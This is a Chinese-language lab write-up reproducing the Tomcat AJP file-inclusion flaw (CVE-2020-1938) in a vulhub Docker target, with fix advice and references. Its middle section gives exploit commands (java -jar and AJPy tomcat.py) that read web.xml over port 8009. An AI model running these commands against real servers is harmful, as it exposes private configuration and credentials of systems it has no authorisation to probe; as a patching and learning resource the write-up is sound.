Tomcat AJP 檔案包含漏洞復現(CVE-2020-1938)
漏洞原理
Tomcat 伺服器是一個免費的開放原始碼的Web 應用伺服器,其安裝後會預設開啟ajp聯結器,方便與其他web伺服器通過ajp協議進行互動。
環境搭建
靶機 kali2020 ,使用docker容器,進入vulhub-master/tomcat/CVE-2020-1938目錄下一鍵啟動
sudo docker-compose up -d
web訪問啟動地址,成功獲取web頁面,服務啟動成功
漏洞復現
使用nmap掃描埠
nmap 192.168.177.137
成功讀取web.xml檔案內容
工具地址:
https://github.com/0nise/CVE-2020-1938
java -jar 1.jar 192.168.177.137 8009 file /WEB-INF/web.xml //使用java工具讀取
或者使用python指令碼檢測:
https://github.com/hypn0s/AJPy
讀取Tomcat版本
python2 tomcat.py version 192.168.177.137
讀取web.xml檔案內容
python2 tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.177.137
漏洞復現是流量顯示,伺服器返回資訊:
漏洞修復
影響版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 9 < 9.0.31
修復建議
1、禁用AIP協議埠,在conf/server.xml配置檔案中註釋掉<Connector port="8009"protocol="AJP/1.3"redirectPort="8443"/>;
2、升級最新版本;
3、Tomcat 7和Tomcat 9可為AJP Connector配置secret來設定AJP協議的認證憑證;
4、Tomcat 8的可為AJP Connector配置requiredSecret來設定AJP協議的認證憑證。
參考連結
http://www.bubuko.com/infodetail-3432049.html
https://www.cnblogs.com/renhaoblog/p/13033734.html
https://www.jianshu.com/p/f3e4b5896edb
https://xz.aliyun.com/t/7325
https://www.freebuf.com/vuls/228108.html
免責宣告
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !